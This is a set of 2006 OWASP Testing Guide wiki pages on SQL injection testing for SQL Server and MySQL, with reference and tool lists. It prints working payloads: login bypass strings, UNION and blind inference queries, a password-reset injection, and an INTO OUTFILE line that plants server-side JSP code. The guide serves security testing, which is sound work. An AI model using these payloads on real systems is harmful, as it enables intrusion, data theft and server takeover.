What we do here is to attempt a connection to the local database (specified by the empty field after 'SQLOLEDB') using "sa" and "<pwd>" as credentials. If the password is correct and the connection is successful, the query is executed, making the DB wait for 5 seconds (and also returning a value, since OPENROWSET expects at least one column). Fetching the candidate passwords from a wordlist and measuring the time needed for each connection, we can attempt to guess the correct password. In "Data-mining with SQL Injection and Inference", David Litchfield pushes this technique even further, by injecting a piece of code in order to bruteforce the sysadmin password using the CPU resources of the DB Server itself.
Once we have the sysadmin password, we have two choices:

* Inject all following queries using OPENROWSET, in order to use sysadmin privileges

* Add our current user to the sysadmin group using sp_addsrvrolemember. The current user name can be extracted using inferenced injection against the variable system_user

===Checking for version and vulnerabilities===
In case the pen tester can make some queries to the database engine, he will be able to get the database engine's version. He can next match this product name and version with known vulnerabilities or a zero-day exploit that he might have access to.

== References ==
'''Whitepapers''' 
* David Litchfield: "Data-mining with SQL Injection and Inference" - http://www.nextgenss.com/research/papers/sqlinference.pdf
* Chris Anley, "(more) Advanced SQL Injection", whitepaper. NGSSoftware Insight Security Research Publication, 2002.
* Steve Friedl's Unixwiz.net Tech Tips: "SQL Injection Attacks by Example" - http://www.unixwiz.net/techtips/sql-injection.html
* Alexander Chigrik: "Useful undocumented extended stored procedures" - http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm
* Antonin Foller: "Custom xp_cmdshell, using shell object" - http://www.motobit.com/tips/detpg_cmdshell
* Paul Litwin: "Stop SQL Injection Attacks Before They Stop You" - http://msdn.microsoft.com/msdnmag/issues/04/09/SQLInjection/
* SQL Injection - http://msdn2.microsoft.com/en-us/library/ms161953.aspx

'''Tools''' 
* Francois Larouche: Multiple DBMS Sql Injection tool - [[http://www.sqlpowerinjector.com/index.htm SQL Power Injector]]
* Northern Monkee: [[http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html Bobcat]]
* icesurfer: SQL Server Takeover Tool - [[http://sqlninja.sourceforge.net sqlninja]]
* Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool - http://sqlmap.sourceforge.net

{{Category:OWASP Testing Project AoC}}

Blind SQL Injection

2006-12-20T09:08:04Z

Inquis:

{{Template:Attack}}

==Description==
Blind SQL injection is identical to normal [[SQL injection]], however, when such an attack is performed a handled error message is returned. This results in no generic database error messages and without disclosing such information the attacker is working 'blindly.'

'''Online Resources'''
* [http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf more Advanced SQL Injection] - by NGS
* [http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-hotchkies/bh-us-04-hotchkies.pdf Blind SQL Injection Automation Techniques] - Black Hat Pdf
* [http://seclists.org/lists/bugtraq/2005/Feb/0288.html Blind Sql-Injection in MySQL Databases]
* [http://www.cgisecurity.com/questions/blindsql.shtml Cgisecurity.com: What is Blind SQL Injection?]
* [http://www.securitydocs.com/library/2651 Blind SQL Injection]
* http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf
* http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html
* [http://wcsc.myweb.usf.edu/tutorials/SQL_Injection.ppt SQL Injection Attacks]

'''Tools'''
* [http://www.sqlpowerinjector.com/ SQL Power Injector]
* [http://www.0x90.org/releases/absinthe/ [Absinthe :: Automated Blind SQL Injection] // ver1.3.1
* [http://www.securiteam.com/tools/5IP0L20I0E.html SQLBrute - Multi Threaded Blind SQL Injection Bruteforcer] in Python
* [http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project SQLiX - SQL Injection Scanner] in Perl
* [http://sqlmap.sourceforge.net sqlmap, a blind SQL injection tool] in Python

==Examples ==

==Related Threats==

==Related Attacks==

==Related Problems==
* [[Injection problem]]

==Related Countermeasures==

==Categories==
[[Category:Attack]]
[[Category:Injection Attack]]
[[Category:OWASP_CLASP_Project]]
[[Category:OWASP_SQLiX_Project]]
[[Category:Code Snippet]]
[[Category:Java]]
[[Category:SQL]]

Testing for SQL Injection (OTG-INPVAL-005)

2006-12-14T19:55:40Z

Inquis:

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
A SQL injection attack consists of insertion or "injection" of an SQL query via the input data from the client to the application. 
A successful sql injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such shutdown the DBMS), recover the content of a given file present on the DBMS filesystem and in some cases issue commands to the operating system.
For an introduction to SQL Injection, please refer to the references at the bottom of the page.

== Description of the Issue ==
SQL Injection attacks can be divided in the following three classes:
* Inband: data is extracted using the same channel that is used to inject the SQL code. This is the most straightforward kind of attack, in which the retrieved data is presented directly in the application web page
* Out-of-band: data is retrieved using a different channel (e.g.: an email with the results of the query is generated and sent to the tester)
* Inferential: there is no actual transfer of data, but the tester is able to reconstruct the information by sending particular requests and observing the resulting behaviour of the DB Server
Independently from the attack class, in order to perform a SQL Injection attack it is necessary to craft a syntactically correct SQL Query. If the application returns the error message generated by an incorrect query, then it is easy to reconstruct the logic of the original query and therefore understand how to perform the injection correctly. However, if the application hides the error details, then the tester must be able to reverse engineer the logic of the original query. The latter case is known as "Blind SQL Injection" .

== Black Box testing and example ==

=== SQL Injection Detection ===

The first step in this test is to understand when our application connects to a DB Server in order to access some data. Typical examples of cases when an application needs to talk to a DB include:
* Authentication forms: when authentication is performed using a web form, chances are that the user credentials are checked against a database that contains all usernames and passwords (or, better, password hashes)
* Search engines: the string submitted by the user could be used in a SQL query that extracts all relevant records from a database
* E-Commerce sites: the products and their characteristics (price, description, availability, ...) are very likely to be stored in a relational database.
The tester has to make a list of all input fields whose values could be used in crafting a SQL query, including the hidden fields of POST requests and then test them separately, trying to interfere with the query and to generate an error.
The very first test usually consists of adding a single quote (') or a semicolon (;) to the field under test. The first is used in SQL as a string terminator and, if not filtered by the application, would lead to an incorrect query. The second is used to end a SQL statement and, if it is not filtered, it is also likely to generate an error.
The output of a vulnerable field might resemble the following (on a Microsoft SQL Server, in this case):
<pre>
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/target/target.asp, line 113
</pre>
Also comments (--) and other SQL keywords like 'AND' and 'OR' can be used to try to modify the query. A very simple but sometimes still effective technique is simply to insert a string where a number is expected, as an error like the following might be generated:
<pre>
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
varchar value 'test' to a column of data type int.
/target/target.asp, line 113
</pre>
A full error message like the ones in the examples provides a wealth of information to the tester in order to mount a successful injection. However, applications often do not provide so much detail: a simple '500 Server Error' or a custom error page might be issued, meaning that we need to use blind injection techniques.
In any case, it is very important to test *each field separately*: only one variable must vary while all the other remain constant, in order to precisely understand which parameters are vulnerable and which are not.

=== Standard Sql Injection Testing ===

Consider the following sql query:

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

A similar query is generally used from the web application in order to authenticate a user. If the query returns a value it means that inside the database a user with that credentials exists, then the user is allowed to login to the system, otherwise the access is denied.
The values of the input fields are inserted from the user generally through a web form.
We suppose to insert the following Username and Password values:

$username = 1' or '1' = '1
$password = 1' or '1' = '1

The query will be:

<nowiki>SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'</nowiki>
If we suppose that the values of the parameters are sent to the server through the GET method, and if the domain of the vulnerable web site is www.example.com, the request that we'll carry out will be:

<nowiki>http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1 </nowiki>

After a short analysis we notice that the query return a value (or a set of values) because the condition is always true (OR 1=1). In this way the system has authenticated the user without knowing the username and password. ''In some systems the first row of a user table would be an administrator user. This may be the profile returned in some cases.''
Another example of query is the following:

SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))

In this case, there are two problems, one due to the use of the parenthesis and one due to the use of MD5 hash function.
First of all we resolve the problem of the parenthesis.
That simply consist of adding a number of closing parenthesis until we obtain a corrected query. To resolve the second problem we try to invalidate the second condition.
We add to our query a final symbol that means that a comment is beginning. In this way everything that follows such symbol is considered as a comment.
Every DBMS has the own symbols of comment, however a common symbol to the greater part of the database is /*. In Oracle the symbol is "--".
Saying this, the values that we'll use as Username and Password are:

$username = 1' or '1' = '1'))/*
$password = foo

In this way we'll get the following query:

SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password')))

The url request will be:

<nowiki>http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo </nowiki>

Which return a number of values. Sometimes, the authentication code verifies that the number of returned tuple is exactly equal to 1. In the previous examples, this situation would be difficult (in the database there is only one value per user).
In order to go around to this problem, it is enough to insert a sql command, that imposes the condition that the number of the returned tuple must be one. (One record returned)
In order to reach this goal, we use the command "LIMIT <num>", where <num> is the number of the tuples that we expect to be returned. The value of the fields Username and Password regarding the previous example will be modified according the following:

$username = 1' or '1' = '1')) LIMIT 1/*
$password = foo

In this way we create a request like the follow:

<nowiki>http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))%20LIMIT%201/*&password=foo </nowiki>

=== Union Query Sql Injection Testing ===
Another test to carry out, involves the use of the UNION operation. Through such operation it is possible, in case of Sql Injection, to join a query, purposely forged from the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of fields of other tables.
We suppose for our examples that the query executed from the server is the following:

SELECT Name, Phone, Address FROM Users WHERE Id=$id

We will set the following Id value:

$id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCarTable

We will have the following query:

SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCarTable

which will join the result of the original query with all the credit card users.
The keyword '''ALL''' is necessary to get around the query that make use of keyword DISTINCT.
Moreover we notice that beyond the credit card numbers, we have selected other two values. These two values are necessary, because the two query must have an equal number of parameters, in order to avoid a syntax error.

=== Blind Sql Injection Testing ===
We have pointed out that exists another category of sql injection, called Blind Sql Injection, in which nothing is known on the outcome of an operation. This behavior happens in cases where the programmer has created a customed error page that does not reveal anything on the structure of the query or on the database. (Does not return a SQL error, it may just return a HTTP 500).
 
Thanks to the inference methods it is possible to avoid this obstacle and thus to succeed to recover the values of some desired fields. The method consists in carrying out a series of booloean queries to the server, observing the answers and finally deducing the meaning of such answers.
We consider, as always, the www.example.com domain and we suppose that it contains a parameter vulnerable to sql injection of name id.
This means that carrying out the following request:

<nowiki>http://www.example.com/index.php?id=1' </nowiki>

we will get one page with a custom message error which is due to a syntactic error in the query. We suppose that the query executed on the server is:

SELECT field1, field2, field3 FROM Users WHERE Id='$Id'

which is exploitable through the methods seen previously.
What we want is to obtain the values of the username field. The tests that we will execute will allow us to obtain the value of the username field, extracting such value character by character. This is possible through the use of some standard functions, present practically in every database. For our examples we will use the following pseudo-functions:

'''SUBSTRING (text, start, length)''': it returns a substring starting from the position "start" of text and of length "length". If "start" is greater than the length of text, the function returns a null value.

'''ASCII (char)''': it gives back ASCII value of the input character. A null value is returned if char is 0.

'''LENGTH (text)''': it gives back the length in characters of the input text.

Through such functions we will execute our tests on the first character and, when we will have discovered the value, we will pass to the second and so on, until we will have discovered the entire value.
The tests will take advantage of the function SUBSTRING in order to select only one character at time (selecting a single character means to impose the length parameter to 1) and function ASCII in order to obtain the ASCII value, so that we can do numerical comparison. The results of the comparison will be done with all the values of ASCII table, until finding the desired value.
As an example we will insert the following value for ''Id'':

$Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1

that creates the following query (from now on we will call it "inferential query"):

SELECT field1, field2, field3 FROM Users WHERE Id='1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1'

The previous returns a result if and only if the first character of field username is equal to the ASCII value 97. If we get a false value then we increase the index of ASCII table from 97 to 98 and we repeat the request. If instead we obtain a true value, we set to zero the index of the table and we pass to analyze the next character, modifying the parameters of SUBSTRING function.
The problem is to understand in that way we distinguish the test that has carried a true value, from the one that has carried a false value.
In order to make this we create a query that we are sure returns a false value.
This is possible by the following value as field ''Id'':

$Id=1' AND '1' = '2

by which will create the following query:

SELECT field1, field2, field3 FROM Users WHERE Id='1' AND '1' = '2'

The answer of the server obtained (that is HTML code) will be the false value for our tests.
This is enough to verify whether the value obtained from the execution of the inferential query is equal to the value obtained with the test exposed before.
Sometimes this method does not work. In the case the server returns two defferent pages as a result of two identical consecutive web requests we will not be able to discriminate the true value from the false value. In these particular cases, it is necessary to use particular filters that allow us to eliminate the code that changes between the two requests and to obtain a template. Later on, for every inferential request executed, we will extract the relative template from the response using the same function, and we will perform a control between the two template in order to decide the result of the test.
In the previous tests, we are supposed to know in what way it is possible to understand when we have ended the inference beacause we have obtained the value.
In order to understand when we have ended, we will use one characteristic of the SUBSTRING function and the LENGTH function.
When our test will return a true value and we would have used an ASCII code equals to 0 (that is the value null), then that mean that we have ended to make inference, or that the value we have analyzed effectively contains the value null.

We will insert the following value for the field ''Id'':

$Id=1' AND LENGTH(username)=N AND '1' = '1

Where N is the number of characters that we have analyzed with now (excluded the null value).
The query will be:

SELECT field1, field2, field3 FROM Users WHERE Id='1' AND LENGTH(username)=N AND '1' = '1'

that gives back a true or false value. If we have a true value, then we have ended to make inference and therefore we have gained the value of the parameter. If we obtain a false value, this means that the null character is present on the value of the parameter, then we must continue to analyze the next parameter until we will find another null value.

The blind sql injection attack needs a high volume of queries. The tester may need an automatic tool to exploit the vulnerability.
A simple tool which performs this task, via GET requests on MySql DB is SqlDumper, is shown below.

[[Image:sqldumper.jpg]]

=== Stored Procedure Injection ===
Question: How can the risk of SQL injection be eliminated? 
Answer: Stored procedures. 
I have seen this answer too many times without qualifications. Merely the use of stored procedures does not assist in the mitigation of SQL injection. If not handled properly, dynamic SQL within stored procedures can be just as vulnerable to SQL injection as dynamic SQL within a web page. 
When using dynamic SQL within a stored procedure, the application must properly sanitize the user input to eliminate the risk of code injection. If not sanitized, the user could enter malicious SQL that will be executed within the stored procedure. 

Black box testing uses SQL injection to compromise the system.
 
Consider the following SQL Server Stored Procedure: 
Create procedure user_login @username varchar(20), @passwd varchar(20) As
Declare @sqlstring varchar(250)
Set @sqlstring = ‘
Select 1 from users
Where username = ‘ + @username + ‘ and passwd = ‘ + @passwd
exec(@sqlstring)
Go
User input: 
anyusername or 1=1'
anypassword
This procedure does not sanitize the input therefore allowing the return value to show an existing record with these parameters. 
NOTE: This example may seem unlikely due to the use of dynamic SQL to log in a user but consider a dynamic reporting query where the user selects the columns to view. The user could insert malicious code into this scenario and compromise the data.
 
Consider the following SQL Server Stored Procedure: 
Create procedure get_report @columnamelist varchar(20) As
Declare @sqlstring varchar(8000)
Set @sqlstring = ‘
Select ‘ + @columnamelist + ‘ from ReportTable‘
exec(@sqlstring)
Go
User input: 
1 from users’; + ‘update users set password = 'password'; select 1’
This will result in the report running and all users’ passwords being updated.
 

== References ==

'''Whitepapers''' 

* Victor Chapela: "Advanced SQL Injection" - http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
* Chris Anley: "Advanced SQL Injection In SQL Server Applications" - http://www.nextgenss.com/papers/advanced_sql_injection.pdf
* Chris Anley: "More Advanced SQL Injection" - http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf
* David Litchfield: "Data-mining with SQL Injection and Inference" - http://www.nextgenss.com/research/papers/sqlinference.pdf
* Kevin Spett: "SQL Injection" - http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
* Kevin Spett: "Blind SQL Injection" - http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf
* Imperva: "Blind Sql Injection" - http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html

'''Tools''' 
* OWASP SQLiX- http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project
* Francois Larouche: Multiple DBMS Sql Injection tool - [[http://www.sqlpowerinjector.com/index.htm SQL Power Injector]] 
* ilo--: MySql Blind Injection Bruteforcing, Reversing.org - [[http://www.reversing.org/node/view/11 sqlbftools]] 
* Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool - http://sqlmap.sourceforge.net
* Antonio Parata: Dump Files by sql inference on Mysql - [[http://www.ictsc.it/site/IT/projects/sqlDumper/sqldumper.src.tar.gz SqlDumper]] 
* icesurfer: SQL Server Takeover Tool - [[http://sqlninja.sourceforge.net sqlninja]]

{{Category:OWASP Testing Project AoC}}

Testing for MySQL

2006-12-14T19:55:04Z

Inquis:

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Short Description of the Issue (Topic and Explanation) ==
[[SQL Injection]] vulnerabilities occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers. It allows for the execution of SQL code under the privileges of the user used to connect to the database.

''MySQL server'' has a few particularities so that some exploits need to be
specially customized for this application. That's the subject of this section.

== Black Box testing and example ==

=== How to Test ===
When a SQL Injection is found with MySQL as DBMS backend,
there is a number of attacks that could be accomplished depending
on MySQL version and user privileges on DBMS.

MySQL comes with at least four versions used in production worldwide.
3.23.x, 4.0.x, 4.1.x and 5.0.x.
Every version has a set of features proportional to version number.

* From Version 4.0: UNION
* From Version 4.1: Subqueries
* From Version 5.0: Stored procedures, Stored functions and the view named INFORMATION_SCHEMA
* From Version 5.0.2: Triggers

To be noted that for MySQL versions before 4.0.x, only Boolean or time-based Blind Injection could be used, as no subqueries or UNION statements are implemented.

From now on, it will be supposed there is a classic SQL injection in a request like the one described in the Section on [[Testing for SQL Injection]].

<nowiki>http://www.example.com/page.php?id=2</nowiki>

=== The single Quotes Problem ===
Before taking advantage of MySQL features,
it has to be taken in consideration how strings could be represented
in a statement, as often web applications escape single quotes.

MySQL quote escaping is the following: 
''' <nowiki>'A string with \'quotes\''</nowiki> '''

That is MySQL interprets escaped apostrophes (\') as characters and not as
metacharacters.

So if the needs of using constant strings occurs,
two cases are to be differentiated:
# Web app escapes single quotes (' => \')
# Web app does not escapes single quotes escaped (' => ')

Under MySQL there is some standard way to bypass the need of single quotes, anyway there is some trick to have a constant string to be declared without the needs of single quotes.

Let's suppose we want know the value of a field named 'password' in a record
with a condition like the following:
password like 'A%'

# The ascii values in a concatenated hex: 
#: password LIKE 0x4125
# The char() function:
#: password LIKE CHAR(65,37)

=== Multiple mixed queries: ===

MySQL library connectors do not support multiple queries separated
by '''<nowiki>';'</nowiki>''' so there's no way to inject multiple non homogeneous SQL commands inside a single SQL injection vulnerability like in Microsoft SQL Server.

As an example the following injection will result in an error:

1 ; update tablename set code='javascript code' where 1 --

=== Information gathering ===

==== Fingerprinting MySQL ====

Of course, the first thing to know is if there's MySQL DBMS as a backend.

MySQL server has a feature that is used to let other DBMS to ignore a clause in MySQL
dialect. When a comment block ''('/**/')'' contains an exlamation mark ''('/*! sql here*/')'' it is interpreted by MySQL, and is considered as a normal comment block by other DBMS
as explained in [[http://dev.mysql.com/doc/refman/5.0/en/comments.html MySQL manual]].

E.g.:
1 /*! and 1=0 */

'''Result Expected:''' 
''If MySQL is present, the clause inside comment block will be interpreted.''

==== Version ====

There are three ways to gain this information:
# By using the global variable @@version
# By using the function [[http://dev.mysql.com/doc/refman/5.0/en/information-functions.html VERSION()]]
# By using comment fingerprinting with a version number /*!40110 and 1=0*/
#: which means
<nowiki>if(version >= 4.1.10)
add 'and 1=0' to the query.</nowiki>

These are equivalent as the result is the same.

In band injection:

1 AND 1=0 UNION SELECT @@version /*

Inferential injection:

1 AND @@version like '4.0%'

'''Result Expected:''' 
''A string like this: '''5.0.22-log''' ''

==== Login User ====

There are two kinds of users MySQL Server relies.
# [[http://dev.mysql.com/doc/refman/5.0/en/information-functions.html USER()]]: the user connected to MySQL Server.
# [[http://dev.mysql.com/doc/refman/5.0/en/information-functions.html CURRENT_USER()]]: the internal user is executing the query.

There is some difference between 1 and 2.

The main one is that an anonymous user could connect (if allowed)
with any name but the MySQL internal user is an empty name (<nowiki>''</nowiki>).

Another difference is that a stored procedure or a stored function
are executed as the creator user, if not declared elsewhere. This
could be known by using '''CURRENT_USER'''.

In band injection:

1 AND 1=0 UNION SELECT USER()

Inferential injection:

1 AND USER() like 'root%'

'''Result Expected:''' 
''A string like this: '''user@hostname''' ''

==== Database name in use ====

There is the native function DATABASE()

In band injection:

1 AND 1=0 UNION SELECT DATABASE()

Inferential injection:

1 AND DATABASE() like 'db%'

'''Result Expected:''' 
''A string like this: '''dbname''' ''

==== INFORMATION_SCHEMA ====
From MySQL 5.0 a view named [[http://dev.mysql.com/doc/refman/5.0/en/information-schema.html INFORMATION_SCHEMA]] was created.
It allows to get all informations about databases, tables and columns
as well as procedures and functions.

Here is a summary about some interesting View.
{| border=1
|| '''Tables_in_INFORMATION_SCHEMA''' || '''DESCRIPTION'''
|-
|| ..[skipped]..|| ..[skipped]..
|-
|| SCHEMATA || All databases the user has (at least) SELECT_priv
|-
|| SCHEMA_PRIVILEGES || The privileges the user has for each DB
|-
|| TABLES || All tables the user has (at least) SELECT_priv
|-
|| TABLE_PRIVILEGES || The privileges the user has for each table
|-
|| COLUMNS || All columns the user has (at least) SELECT_priv
|-
|| COLUMN_PRIVILEGES || The privileges the user has for each column
|-
|| VIEWS || All columns the user has (at least) SELECT_priv
|-
|| ROUTINES || Procedures and functions (needs EXECUTE_priv)
|-
|| TRIGGERS || Triggers (needs INSERT_priv)
|-
|| USER_PRIVILEGES || Privileges connected User has
|-
|}
All of these informations could be extracted by using known techniques as
described in SQL Injection paragraph.

=== Attack vectors ===

==== Write in a File ====

If connected user has '''FILE''' privileges _and_ single quotes are not escaped,
it could be used the 'into outfile' clause to export query results in a file.

Select * from table into outfile '/tmp/file'

N.B. there are no ways to bypass single quotes outstanding filename.
So if there's some sanitization on single quotes like escape (\') there will
be no way to use 'into outfile' clause.

This kind of attack could be used as an out-of-band technique to gain informations
about the results of a query or to write a file which could be executed inside the
web server directory.

Example:

<nowiki>1 limit 1 into outfile '/var/www/root/test.jsp' FIELDS ENCLOSED BY '//' LINES TERMINATED BY '\n<%jsp code here%>';</nowiki>

'''Result Expected:''' 
'' Results are stored in a file with rw-rw-rw privileges owned by
mysql user and group.

Where ''/var/www/root/test.jsp'' will contain:
<nowiki>//field values//
<%jsp code here%></nowiki>

==== Read from a File ====

Load_file is a native function that can read a file when allowed by
filesystem permissions.

If connected user has '''FILE''' privileges, it could be used to get files content.

Single quotes escape sanitization can by bypassed by using previously described
techniques.

load_file('filename')

'''Result Expected:''' 

'' the whole file will be available for exporting by using standard techniques.''

=== Standard SQL Injection Attack ===

In a standard SQL injection you can have results displayed directly
in a page as normal output or as a MySQL error.
By using already mentioned SQL Injection attacks and the already described
MySQL features, direct SQL injection could be easily accomplished at a level
depth depending primarily on mysql version the pentester is facing.

A good attack is to know the results by forcing a function/procedure
or the server itself to throw an error.
A list of errors thrown by MySQL and in particular native functions could
be found on [[http://dev.mysql.com/doc/refman/5.0/en/error-messages-server.html MySQL Manual]].

=== Out of band SQL Injection ===

Out of band injection could be accomplished by using the [[#Write_in_a_File|'into outfile']] clause.
=== Blind SQL Injection ===
For blind SQL injection there is a set of useful function natively provided by MySQL server.

* String Length:
*: ''LENGTH(str)''
* Extract a substring from a given string:
*: ''SUBSTRING(string, offset, #chars_returned)''
* Time based Blind Injection: BENCHMARK and SLEEP
*: ''BENCHMARK(#ofcicles,action_to_be_performed )''
*: Benchmark function could be used to perform timing attacks when blind injection by boolean values does not yeld any results.
*: See. SLEEP() (MySQL > 5.0.x) for an alternative on benchmark.

For a complete list the reader could refer to MySQL manual - http://dev.mysql.com/doc/refman/5.0/en/functions.html

== References ==
'''Whitepapers''' 
* Chris Anley: "Hackproofing MySQL" -http://www.nextgenss.com/papers/HackproofingMySQL.pdf

'''Case Studies''' 
* Time Based SQL Injection Explained - http://www.f-g.it/papers/blind-zk.txt

'''Tools''' 
* Francois Larouche: Multiple DBMS SQL Injection tool - http://www.sqlpowerinjector.com/index.htm 
* ilo--: MySQL Blind Injection Bruteforcing, Reversing.org - http://www.reversing.org/node/view/11 sqlbftools 
* Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool - http://sqlmap.sourceforge.net
* Antonio Parata: Dump Files by SQL inference on Mysql - http://www.ictsc.it/site/IT/projects/sqlDumper/sqldumper.src.tar.gz 

{{Category:OWASP Testing Project AoC}}

Appendix A: Testing Tools

2006-12-14T19:53:27Z

Inquis:

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

==Open Source Black Box Testing tools==

* '''OWASP WebScarab''' - http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project 

* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project 
** CAL9000 is a collection of browser-based tools that enable more effective and efficient manual testing efforts. Includes an XSS Attack Library, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more.

* '''OWASP Pantera''' - http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project 

* SPIKE - http://www.immunitysec.com
* Paros - http://www.proofsecure.com
* Burp Proxy - http://www.portswigger.net
* Achilles Proxy - http://www.mavensecurity.com/achilles
* Odysseus Proxy - http://www.wastelands.gen.nz/odysseus/
* Webstretch Proxy - http://sourceforge.net/projects/webstretch 
* Firefox LiveHTTPHeaders, Tamper Data and Developer Tools- http://www.mozdev.org
* Sensepost Wikto (Google cached fault-finding) - http://www.sensepost.com/research/wikto/index2.html

=== Testing for specific vulnerabilities ===

'''Testing AJAX ''' 
* OWASP SPRAJAX - http://www.owasp.org/index.php/Category:OWASP_Sprajax_Project
'''Testing for SQL Injection ''' 
* OWASP SQLiX - http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project
* Multiple DBMS Sql Injection tool - [SQL Power Injector]
* MySql Blind Injection Bruteforcing, Reversing.org - [sqlbftools]
* Antonio Parata: Dump Files by sql inference on Mysql - [SqlDumper]
* Sqlninja: a SQL Server Injection&Takeover Tool - http://sqlninja.sourceforge.net
* Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool - http://sqlmap.sourceforge.net/
* Absinthe 1.1 (formerly SQLSqueal) - http://www.0x90.org/releases/absinthe/ 
* SQLInjector - http://www.databasesecurity.com/sql-injector.htm
'''Testing Oracle'''
* TNS Listener tool (Perl) - http://www.jammed.com/%7Ejwa/hacks/security/tnscmd/tnscmd-doc.html
* Toad for Oracle - http://www.quest.com/toad
'''Testing SSL ''' 
* Foundstone SSL Digger - http://www.foundstone.com/resources/proddesc/ssldigger.htm
'''Testing for Brute Force Password'''
* THC Hydra - http://www.thc.org/thc-hydra/
* John the Ripper - http://www.openwall.com/john/
* Brutus - http://www.hoobie.net/brutus/
'''Testing for HTTP Methods'''
* NetCat - http://www.vulnwatch.org/netcat
'''Testing Buffer Overflow'''
* OllyDbg: "A windows based debugger used for analyzing buffer overflow vulnerabilities" - http://www.ollydbg.de
* Spike, A fuzzer framework that can be used to explore vulnerabilities and perform length testing - http://www.immunitysec.com/downloads/SPIKE2.9.tgz
* Brute Force Binary Tester (BFB), A proactive binary checker - http://bfbtester.sourceforge.net/
* Metasploit, A rapid exploit development and Testing frame work - http://www.metasploit.com/projects/Framework/
'''Fuzzer''' 
* OWASP WSFuzzer - http://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project
'''Googling''' 
* Foundstone Sitedigger (Google cached fault-finding) - http://www.foundstone.com/resources/proddesc/sitedigger.htm

==Commercial Black Box Testing tools==

* Typhon - http://www.ngssoftware.com/products/internet-security/ngs-typhon.php
* NGSSQuirreL - http://www.ngssoftware.com/products/database-security/
* Watchfire AppScan - http://www.watchfire.com
* Cenzic Hailstorm - http://www.cenzic.com/products_services/cenzic_hailstorm.php 
* SPI Dynamics WebInspect - http://www.spidynamics.com
* Burp Intruder - http://portswigger.net/intruder 
* Acunetix Web Vulnerability Scanner - http://www.acunetix.com/ 
* ScanDo - http://www.kavado.com
* WebSleuth - http://www.sandsprite.com
* NT Objectives NTOSpider - http://www.ntobjectives.com/products/ntospider.php 
* Fortify Pen Testing Team Tool - http://www.fortifysoftware.com/products/tester 
* Sandsprite Web Sleuth - http://sandsprite.com/Sleuth/ 
* MaxPatrol Security Scanner - http://www.maxpatrol.com/ 
* Ecyware GreenBlue Inspector - http://www.ecyware.com/ 
* Parasoft WebKing (more QA-type tool) 

==Source Code Analyzers==

===Open Source / Freeware===

* http://www.securesoftware.com
* FlawFinder - http://www.dwheeler.com/flawfinder
* Microsoft’s FXCop - http://www.gotdotnet.com/team/fxcop
* Split - http://splint.org
* Boon - http://www.cs.berkeley.edu/~daw/boon
* Pscan - http://www.striker.ottawa.on.ca/~aland/pscan

===Commercial ===

* Fortify - http://www.fortifysoftware.com
* Ounce labs Prexis - http://www.ouncelabs.com
* GrammaTech - http://www.grammatech.com
* ParaSoft - http://www.parasoft.com
* ITS4 - http://www.cigital.com/its4
* CodeWizard - http://www.parasoft.com/products/wizard

==Acceptance Testing Tools==
Acceptance testing tools are used validate the functionality of web applications. Some follow a scripted approach and typically make use of a Unit Testing framework to construct test suites and test cases. Most, if not all, can be adapted to perform security specific tests in addition to functional tests.

===Open Source Tools===

* WATIR - http://wtr.rubyforge.org/ - A Ruby based web testing framework that provides an interface into Internet Explorer. Windows only.
* HtmlUnit - http://htmlunit.sourceforge.net/ - A Java and JUnit based framework that uses the Apache HttpClient as the transport. Very robust and configurable and is used as the engine for a number of other testing tools.
* jWebUnit - http://jwebunit.sourceforge.net/ - A Java based meta-framework that uses htmlunit or selenium as the testing engine.
